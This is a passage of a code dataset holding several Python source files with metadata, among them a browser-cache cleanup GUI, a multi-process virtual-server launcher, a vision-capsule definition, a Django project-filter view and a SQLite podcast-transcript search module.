"torch.nn.Linear", "line_number": 104, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 110, "usage_type": "name"}]} +{"seq_id": "71620727525", "text": "import os\r\nimport subprocess\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\nimport json\r\nimport datetime\r\n\r\nlog_file = \"cleanup_log.txt\"\r\nconfig_file = \"config.json\"\r\n\r\ndefault_config_data = {\r\n \"java\": True,\r\n \"ie\": True,\r\n \"edge\": True,\r\n \"chrome\": False,\r\n \"firefox\": False,\r\n \"clear_java_cache\": True,\r\n \"clear_ie_temp\": True,\r\n \"clear_edge_cache\": True,\r\n \"clear_chrome_cache\": False,\r\n \"clear_firefox_cache\": False\r\n}\r\n\r\ntry:\r\n with open(config_file, \"r\") as config:\r\n default_options = json.load(config)\r\nexcept FileNotFoundError:\r\n with open(config_file, \"w\") as config:\r\n json.dump(default_config_data, config, indent=4)\r\n default_options = default_config_data\r\n\r\ndef print_to_log_window(message):\r\n log_window.configure(state='normal')\r\n log_window.insert(tk.END, message + \"\\n\")\r\n log_window.see(tk.END)\r\n log_window.configure(state='disabled')\r\n root.update_idletasks()\r\n\r\ndef kill_processes(process_names):\r\n deleted_files = []\r\n for process_name in process_names:\r\n print_to_log_window(f\"Killing {process_name}...\")\r\n result = subprocess.run(['taskkill', '/F', '/IM', process_name], capture_output=True, text=True)\r\n if result.returncode == 0:\r\n deleted_files.append(f\"Killed: {process_name}\")\r\n return deleted_files\r\n\r\ndef clear_cache(cache_paths):\r\n deleted_files = []\r\n for cache_path in cache_paths:\r\n if os.path.exists(cache_path):\r\n if os.path.isdir(cache_path):\r\n print_to_log_window(f\"Clearing cache directory: {cache_path}\")\r\n deleted_files.extend(list_files_in_directory(cache_path))\r\n for root_dir, dirs, files in os.walk(cache_path):\r\n for file in files:\r\n file_path = os.path.join(root_dir, file)\r\n os.remove(file_path)\r\n deleted_files.append(f\"Deleted: {file_path}\")\r\n else:\r\n print_to_log_window(f\"Removing cache file: {cache_path}\")\r\n os.remove(cache_path)\r\n deleted_files.append(f\"Deleted: {cache_path}\")\r\n return deleted_files\r\n\r\ndef clear_cookies(cookie_paths):\r\n deleted_files = []\r\n for cookie_path in cookie_paths:\r\n if os.path.exists(cookie_path):\r\n print_to_log_window(f\"Removing cookie file: {cookie_path}\")\r\n os.remove(cookie_path)\r\n deleted_files.append(f\"Deleted: {cookie_path}\")\r\n return deleted_files\r\n\r\ndef list_files_in_directory(directory):\r\n deleted_files = []\r\n for root, dirs, files in os.walk(directory):\r\n for file in files:\r\n file_path = os.path.join(root, file)\r\n deleted_files.append(f\"Deleted: {file_path}\")\r\n return deleted_files\r\n\r\ndef apply_actions():\r\n selected_actions = []\r\n deleted_files = []\r\n\r\n if java_var.get():\r\n selected_actions.extend(['javaw.exe', 'java.exe'])\r\n if ie_var.get():\r\n selected_actions.append('iexplore.exe')\r\n if edge_var.get():\r\n selected_actions.append('msedge.exe')\r\n if chrome_var.get():\r\n 
selected_actions.append('chrome.exe')\r\n if firefox_var.get():\r\n selected_actions.append('firefox.exe')\r\n\r\n deleted_files.extend(kill_processes(selected_actions))\r\n\r\n if clear_java_cache_var.get():\r\n print_to_log_window(\"Clearing Java Cache...\")\r\n result = subprocess.run(['javaws', '-uninstall'], capture_output=True, text=True)\r\n if result.returncode == 0:\r\n deleted_files.append(\"Deleted: Java Cache\")\r\n\r\n if clear_ie_temp_var.get():\r\n print_to_log_window(\"Clearing IE Temporary Files and Cookies...\")\r\n result = subprocess.run(['RunDll32.exe', 'InetCpl.cpl,ClearMyTracksByProcess', '255'], capture_output=True, text=True)\r\n if result.returncode == 0:\r\n deleted_files.append(\"Deleted: IE Temporary Files and Cookies\")\r\n\r\n if clear_edge_cache_var.get():\r\n edge_cache_path = os.path.join(os.environ['LocalAppData'], 'Packages', 'Microsoft.MicrosoftEdge_*', 'AC', 'MicrosoftEdge', 'Cache')\r\n edge_cookie_path = os.path.join(os.environ['LocalAppData'], 'Packages', 'Microsoft.MicrosoftEdge_*', 'AC', 'MicrosoftEdge', 'Cookies')\r\n\r\n edge_cache_paths = [\r\n edge_cache_path,\r\n os.path.join(os.environ['LocalAppData'], 'Microsoft', 'Edge', 'User Data', 'Default', 'Cache'),\r\n ]\r\n\r\n print_to_log_window(\"Clearing Edge Cache and Cookies...\")\r\n deleted_files.extend(clear_cache(edge_cache_paths))\r\n deleted_files.extend(clear_cookies([edge_cookie_path]))\r\n\r\n if clear_chrome_cache_var.get():\r\n chrome_cache_path = os.path.join(os.environ['LocalAppData'], 'Google', 'Chrome', 'User Data', 'Default', 'Cache')\r\n chrome_cookie_path = os.path.join(os.environ['LocalAppData'], 'Google', 'Chrome', 'User Data', 'Default', 'Cookies')\r\n\r\n print_to_log_window(\"Clearing Chrome Cache and Cookies...\")\r\n deleted_files.extend(clear_cache([chrome_cache_path]))\r\n deleted_files.extend(clear_cookies([chrome_cookie_path]))\r\n\r\n if clear_firefox_cache_var.get():\r\n firefox_cache_path = os.path.join(os.environ['LocalAppData'], 'Mozilla', 'Firefox', 'Profiles')\r\n firefox_cache_path = os.path.join(firefox_cache_path, os.listdir(firefox_cache_path)[0], 'cache2')\r\n\r\n print_to_log_window(\"Clearing Firefox Cache...\")\r\n deleted_files.extend(clear_cache([firefox_cache_path]))\r\n\r\n print_to_log_window(\"Cleanup completed.\")\r\n with open(log_file, 'a') as f:\r\n timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n f.write(f\"\\n{timestamp}\\n\")\r\n for line in deleted_files:\r\n f.write(line + \"\\n\")\r\n\r\nroot = tk.Tk()\r\nroot.title('CacheW Cleanup Utility')\r\n\r\nlog_window = tk.Text(root, wrap='word', height=15, width=50)\r\nlog_window.configure(state='disabled')\r\nlog_window.pack()\r\n\r\njava_var = tk.BooleanVar(value=default_options[\"java\"])\r\nie_var = tk.BooleanVar(value=default_options[\"ie\"])\r\nedge_var = tk.BooleanVar(value=default_options[\"edge\"])\r\nchrome_var = tk.BooleanVar(value=default_options[\"chrome\"])\r\nfirefox_var = tk.BooleanVar(value=default_options[\"firefox\"])\r\nclear_java_cache_var = tk.BooleanVar(value=default_options[\"clear_java_cache\"])\r\nclear_ie_temp_var = tk.BooleanVar(value=default_options[\"clear_ie_temp\"])\r\nclear_edge_cache_var = tk.BooleanVar(value=default_options[\"clear_edge_cache\"])\r\nclear_chrome_cache_var = tk.BooleanVar(value=default_options[\"clear_chrome_cache\"])\r\nclear_firefox_cache_var = tk.BooleanVar(value=default_options[\"clear_firefox_cache\"])\r\n\r\ntk.Checkbutton(root, text='Java', variable=java_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Internet 
Explorer', variable=ie_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Edge', variable=edge_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Chrome', variable=chrome_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Firefox', variable=firefox_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Java cache', variable=clear_java_cache_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Internet Explorer temporary files', variable=clear_ie_temp_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Edge cache', variable=clear_edge_cache_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Chrome cache', variable=clear_chrome_cache_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Firefox cache', variable=clear_firefox_cache_var).pack(anchor='w')\r\n\r\ntk.Button(root, text='Apply', command=apply_actions).pack(side='left', expand=True, fill='x')\r\ntk.Button(root, text='Exit', command=root.destroy).pack(side='right', expand=True, fill='x')\r\n\r\nroot.mainloop()\r\n", "repo_name": "hclivess/cachew", "sub_path": "cachew.py", "file_name": "cachew.py", "file_ext": "py", "file_size_in_byte": 7740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 29, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 35, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 58, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 102, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 147, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 150, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 154, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 156, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 157, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 159, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 160, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 161, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 162, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 163, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 165, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 166, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 167, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 168, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 170, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 171, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 172, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 173, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 174, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 176, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "39284188403", "text": "#! 
/bin/python3\n\nimport argparse\nimport multiprocessing as mp\nimport pathlib\nimport time\nfrom queue import Empty\n\nfrom utils import file, network\nimport console as con\nfrom console import print, getch\nfrom virserver import Server\n\n\ndef parse_args() -> argparse.Namespace:\n    parser = argparse.ArgumentParser(\n        description=\"Launches multiple virtual servers and displays their status after a certain interval\"\n    )\n    parser.add_argument(\n        \"-i\",\n        \"--interval\",\n        help=\"Time interval in seconds between server status reports\",\n        type=int,\n        required=True,\n        dest=\"interval\",\n    )\n    parser.add_argument(\n        \"-n\",\n        \"--number\",\n        help=\"Total number of virtual servers\",\n        type=int,\n        required=True,\n        dest=\"number\",\n    )\n    parser.add_argument(\n        \"-f\",\n        \"--file\",\n        help=\"Path to the file (either absolute or relative)\",\n        required=True,\n        dest=\"file\",\n    )\n    parser.add_argument(\n        \"-p\",\n        \"--port\",\n        nargs=\"*\",\n        help=\"List of ports that must be equal to the number of virtual servers\",\n        type=int,\n        required=True,\n        dest=\"ports\",\n    )\n    parser.add_argument(\n        \"-c\",\n        \"--color-printing\",\n        help=\"Enables color printing in the console\",\n        action=\"store_true\",\n        default=False,\n        dest=\"colors\",\n    )\n    return parser.parse_args()\n\n\ndef verify(args: argparse.Namespace):\n    con.pretty_printing = args.colors\n    try:\n        # Verify the number of ports equals the number of servers\n        print(\"Validating server count ... \", end=\"\")\n        assert args.number == len(args.ports)\n        con.success(\"OK\")\n        print(\"Validating server ports ... \")\n        for port in args.ports:\n            print(\"\\t{} ... \".format(port), end=\"\")\n            assert network.check_sock(network.get_local_ip(), port)\n            con.success(\"OK\")\n        # Verify a valid file was passed\n        print(\"Validating file ... 
\", end=\"\")\n assert pathlib.Path(args.file).is_file()\n con.success(\"OK\")\n return args\n except AssertionError:\n con.error(\"FAILED\")\n quit(1)\n\n\ndef init(args: argparse.Namespace):\n con.clear()\n con.box_print(\"Project Malcolm\")\n print(\"Local IP Address:\", network.get_local_ip())\n print(\"Public IP Address:\", network.get_public_ip())\n print(\"File size:\", file.get_size(args.file), \"Bytes\")\n print(\"Checksum:\", file.gen_checksum(args.file))\n print()\n print(\"Press any key to start servers\")\n con.getch()\n\n\ndef display_info():\n global procs, queue, status\n while True:\n con.clear()\n try:\n for index, (process_id, process, queue) in enumerate(procs):\n try:\n status[index] = queue.get_nowait()\n except Empty:\n pass\n print('\\r', status[index])\n except KeyboardInterrupt as e:\n for process, queue in procs:\n process.terminate()\n process.join()\n break\n except Exception as e:\n con.error(e)\n else:\n time.sleep(args.interval)\n\n\nif __name__ == \"__main__\":\n args = verify(parse_args())\n init(args)\n\n procs = []\n for process_id, port in enumerate(args.ports, start=1):\n queue: mp.Queue = mp.Queue()\n process = mp.Process(\n target=Server,\n args=(args.file,),\n kwargs={\n \"id\": process_id,\n \"interval\": args.interval,\n \"port\": int(port),\n \"queue\": queue,\n },\n )\n process.start()\n procs.append((process_id, process, queue))\n\n status = [\"Server {}: Status Alive\".format(i) for i, _, _ in procs]\n display = mp.Process(target=display_info)\n display.start()\n while True:\n try:\n x = int(getch())\n for index, (process_id, process, queue) in enumerate(procs):\n if process_id == x:\n _has = True\n queue.put_nowait(\"Server {}: Status DEAD\".format(process_id))\n process.terminate()\n process.join()\n procs.remove(procs[index])\n if len(procs) == 0:\n display.terminate()\n display.join()\n quit()\n except ValueError as e:\n con.error(\"Invalid value provided\\nDescription: {}\".format(e))\n", "repo_name": "UbadahJ/project-malcolm", "sub_path": "src/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 15, "usage_type": "attribute"}, {"api_name": "argparse.Namespace", "line_number": 62, "usage_type": "attribute"}, {"api_name": "console.pretty_printing", "line_number": 63, "usage_type": "attribute"}, {"api_name": "console.print", "line_number": 66, "usage_type": "call"}, {"api_name": "console.success", "line_number": 68, "usage_type": "call"}, {"api_name": "console.print", "line_number": 69, "usage_type": "call"}, {"api_name": "console.print", "line_number": 71, "usage_type": "call"}, {"api_name": "utils.network.check_sock", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.network", "line_number": 72, "usage_type": "name"}, {"api_name": "utils.network.get_local_ip", "line_number": 72, "usage_type": "call"}, {"api_name": "console.success", "line_number": 73, "usage_type": "call"}, {"api_name": "console.print", "line_number": 75, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "console.success", "line_number": 77, "usage_type": "call"}, {"api_name": "console.error", "line_number": 80, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 84, "usage_type": "attribute"}, {"api_name": 
"console.clear", "line_number": 85, "usage_type": "call"}, {"api_name": "console.box_print", "line_number": 86, "usage_type": "call"}, {"api_name": "console.print", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.network.get_local_ip", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.network", "line_number": 87, "usage_type": "name"}, {"api_name": "console.print", "line_number": 88, "usage_type": "call"}, {"api_name": "utils.network.get_public_ip", "line_number": 88, "usage_type": "call"}, {"api_name": "utils.network", "line_number": 88, "usage_type": "name"}, {"api_name": "console.print", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.file.get_size", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.file", "line_number": 89, "usage_type": "name"}, {"api_name": "console.print", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.file.gen_checksum", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.file", "line_number": 90, "usage_type": "name"}, {"api_name": "console.print", "line_number": 91, "usage_type": "call"}, {"api_name": "console.print", "line_number": 92, "usage_type": "call"}, {"api_name": "console.getch", "line_number": 93, "usage_type": "call"}, {"api_name": "console.clear", "line_number": 99, "usage_type": "call"}, {"api_name": "queue.get_nowait", "line_number": 103, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 104, "usage_type": "name"}, {"api_name": "console.print", "line_number": 106, "usage_type": "call"}, {"api_name": "console.error", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 115, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 124, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 125, "usage_type": "call"}, {"api_name": "virserver.Server", "line_number": 126, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 139, "usage_type": "call"}, {"api_name": "console.getch", "line_number": 143, "usage_type": "call"}, {"api_name": "queue.put_nowait", "line_number": 147, "usage_type": "call"}, {"api_name": "console.error", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "21208068976", "text": "from typing import Dict\n\nfrom vcap import BaseBackend, BaseCapsule, DeviceMapper, NodeDescription, \\\n FloatOption, BoolOption, IntOption\n\nfrom .backend import Backend\n\n\nclass Capsule(BaseCapsule):\n name = \"detector_person_example\"\n version = 1\n device_mapper = DeviceMapper.map_to_all_gpus()\n # This capsule takes no input from other capsules\n input_type = NodeDescription(size=NodeDescription.Size.NONE)\n # This capsule produces DetectionNodes of people\n output_type = NodeDescription(\n size=NodeDescription.Size.ALL,\n detections=[\"person\"])\n options = {\n \"detection_threshold\": FloatOption(\n description=\"The confidence threshold for the model. 
A higher \"\n \"value means fewer detections\",\n default=0.5,\n min_val=0.1,\n max_val=1.0),\n \"scale_frame\": BoolOption(\n description=\"If true, the frame width and height will be clamped \"\n \"to the value of scale_frame_max_side_length, \"\n \"preserving aspect ratio\",\n default=False),\n\n \"scale_frame_max_side_length\": IntOption(\n description=\"The width or height to scale frames down to \"\n \"if scale_frames is True\",\n default=2000,\n min_val=200,\n max_val=4000)\n }\n\n @staticmethod\n def backend_loader(capsule_files: Dict[str, bytes], device: str) \\\n -> BaseBackend:\n\n # Real capsules do not need to do this check. This is only to provide\n # a warning for this example because the model is not included in the\n # repo.\n model_filename = \"ssd_mobilenet_v1_coco.pb\"\n try:\n model_file = capsule_files[model_filename]\n except KeyError as exc:\n message = f\"Model [{model_filename}] not found. Did you make \" \\\n f\"sure to run tests? Example models files are not \" \\\n f\"stored directly in the repo, but are downloaded \" \\\n f\"when tests are run.\"\n raise FileNotFoundError(message) from exc\n\n return Backend(model_bytes=model_file,\n metadata_bytes=capsule_files[\"dataset_metadata.json\"],\n device=device)\n", "repo_name": "opencv/open_vision_capsules", "sub_path": "vcap/examples/detector_person_example/capsule.py", "file_name": "capsule.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 126, "dataset": "github-code", "pt": "52", "api": [{"api_name": "vcap.BaseCapsule", "line_number": 9, "usage_type": "name"}, {"api_name": "vcap.DeviceMapper.map_to_all_gpus", "line_number": 12, "usage_type": "call"}, {"api_name": "vcap.DeviceMapper", "line_number": 12, "usage_type": "name"}, {"api_name": "vcap.NodeDescription", "line_number": 14, "usage_type": "call"}, {"api_name": "vcap.NodeDescription.Size", "line_number": 14, "usage_type": "attribute"}, {"api_name": "vcap.NodeDescription", "line_number": 16, "usage_type": "call"}, {"api_name": "vcap.NodeDescription.Size", "line_number": 17, "usage_type": "attribute"}, {"api_name": "vcap.NodeDescription", "line_number": 17, "usage_type": "name"}, {"api_name": "vcap.FloatOption", "line_number": 20, "usage_type": "call"}, {"api_name": "vcap.BoolOption", "line_number": 26, "usage_type": "call"}, {"api_name": "vcap.IntOption", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 41, "usage_type": "name"}, {"api_name": "backend.Backend", "line_number": 57, "usage_type": "call"}, {"api_name": "vcap.BaseBackend", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "71196900325", "text": "import re\nfrom rest_framework.views import APIView\nfrom .models import Project\nfrom rest_framework.response import Response\nfrom .serializers import ProjectSerializer\nfrom .constants import *\n\n# Return list of projects\nclass ProjectDetailsView(APIView):\n def get(self,request):\n snippets = Project.objects.all()\n serializer = ProjectSerializer(snippets, many=True)\n return Response(serializer.data)\n \n#Return list of filtered projects according to query\nclass FilteredDetailsView(APIView):\n def get(self,request):\n search_query = self.request.GET.get('search', '').split(\" \")\n built_query = []\n\n # filtering query on basis of keywords present in db\n for word in search_query:\n word = re.sub('[\\W_]+', '', word)\n word = word.lower()\n if word:\n if word in skillset:\n built_query.append(word)\n elif word in technologies_used:\n 
built_query.append(word)\n\n # return queryset according to skill present in db \n if BACKEND in built_query:\n for tech in built_query:\n if tech in backend_skills:\n queryset = Project.objects.filter(technical_skillset__backend__icontains=tech)\n break\n\n elif FRONTEND in built_query:\n for tech in built_query:\n if tech in frontend_skills:\n queryset = Project.objects.filter(technical_skillset__frontend__icontains=tech)\n \n elif DB or DATABASES in built_query:\n for tech in built_query:\n if tech in db_skills:\n queryset = Project.objects.filter(technical_skillset__databases__icontains=tech)\n \n elif INFRASTRUCTURE in built_query:\n for tech in built_query:\n if tech in infra_skills:\n queryset = Project.objects.filter(technical_skillset__infrastructure__icontains=tech)\n \n serializer = ProjectSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\n\n", "repo_name": "akshitajain917/project_gallery", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 9, "usage_type": "name"}, {"api_name": "models.Project.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 11, "usage_type": "name"}, {"api_name": "serializers.ProjectSerializer", "line_number": 12, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 16, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Project.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Project.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Project.objects.filter", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Project.objects.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 51, "usage_type": "name"}, {"api_name": "serializers.ProjectSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "70228630565", "text": "import sqlite3\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Generator, Iterable\n\nfrom rdt_search.value_objects import Time\n\nINDEX_NAME = \"radiot_search\"\n\n\nclass LastEpisode:\n def __init__(self, db: sqlite3.Cursor):\n self._db = db\n\n def execute(self) -> int:\n return self._db.execute(f\"SELECT MAX(episode_number) FROM {INDEX_NAME}\").fetchone()[0]\n\n\nclass SyntaxError(Exception):\n def __init__(self, message):\n self.message = message\n super().__init__(message)\n\n @classmethod\n def 
from_operational_error(cls, error: str):\n message = error.replace(\"fts5:\", \"\").strip()\n return cls(message)\n\n\nclass Search:\n @dataclass\n class SearchResult:\n episode_number: int\n start_time: Time\n end_time: Time\n text: str\n link: str\n\n class OrderBy(str, Enum):\n RANK_ASC = \"rank_asc\"\n RANK_DESC = \"rank_desc\"\n EPISODE_NUMBER_ASC = \"episode_number_asc\"\n EPISODE_NUMBER_DESC = \"episode_number_desc\"\n\n def to_sql(self):\n col, order = self.value.rsplit(\"_\", maxsplit=1)\n return f\"{col} {order.upper()}\"\n\n def __init__(self, db: sqlite3.Cursor):\n self._db = db\n\n def execute(\n self, q: str, episode_number: int | None, order_by: OrderBy, limit: int = 100\n ) -> list[SearchResult]:\n episode_condition = \"\"\n if episode_number is not None:\n episode_condition = f\" AND episode_number = {int(episode_number)}\"\n\n query = (\n f\"SELECT text, episode_number, start_time, end_time FROM {INDEX_NAME} WHERE text MATCH\"\n f\" ?{episode_condition} ORDER BY {order_by.to_sql()}, start_time LIMIT ?\"\n )\n params = (q, limit)\n return list(self._parsed_rows(self._execute(query, params)))\n\n def _execute(self, query: str, params: tuple):\n try:\n return self._db.execute(query, params).fetchall()\n except sqlite3.OperationalError as e:\n if \"syntax error\" in e.args[0]:\n raise SyntaxError.from_operational_error(e.args[0])\n raise\n\n def _parsed_rows(self, rows: Iterable[tuple]) -> Generator[SearchResult, None, None]:\n for row in rows:\n text, ep, start, end = row\n yield self.SearchResult(\n episode_number=ep,\n start_time=Time(start),\n end_time=Time(end),\n text=text,\n link=link_to_fragment_start(episode_number=ep, seconds=Time(start).seconds),\n )\n\n\ndef link_to_fragment_start(episode_number: int, seconds: int) -> str:\n return f\"https://cdn.radio-t.com/rt_podcast{episode_number}.mp3#t={seconds}\"\n", "repo_name": "yakimka/rdt_search", "sub_path": "rdt_search/queries.py", "file_name": "queries.py", "file_ext": "py", "file_size_in_byte": 2721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.Cursor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 34, "usage_type": "name"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 35, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 31, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlite3.Cursor", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sqlite3.OperationalError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "typing.Iterable", "line_number": 74, "usage_type": "name"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 79, "usage_type": "call"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 80, "usage_type": "call"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 82, "usage_type": "call"}, {"api_name": "typing.Generator", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "6052380329", "text": "#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom ScraperBase import ScraperBase\nfrom Common import Status, SaveHtmlToTable\nimport logging\nfrom typing import Tuple, List\nfrom prepmod import prepmod\nimport re\n\nclass 